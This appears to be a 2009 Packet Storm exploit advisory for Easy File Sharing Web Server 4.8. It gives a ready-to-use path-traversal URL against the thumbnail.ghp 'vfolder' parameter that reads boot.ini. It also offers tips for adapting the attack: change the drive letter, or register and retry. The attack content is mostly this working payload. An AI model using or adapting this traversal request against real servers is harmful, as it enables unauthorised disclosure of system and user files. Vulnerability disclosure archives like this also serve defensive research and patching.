Easy File Sharing Web Server 4.8 File Disclosure

2009-03-05T00:00:00
ID PACKETSTORM:75411
Type packetstorm
Reporter Stack
Modified 2009-03-05T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Easy File Sharing Web Server File Disclouse Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Program: Easy File Sharing Web Server  
Version: 4.8  
Download: http://www.sharing-file.com/efssetup.exe  
Found by Mountassif Moad  
www.v4-team.com  
  
-- Bug --  
Exploit :  
  
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini  
if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this  
and if dont work in first test try to register and test another time  
Tested on win xp SP 2 fr  
  
  
`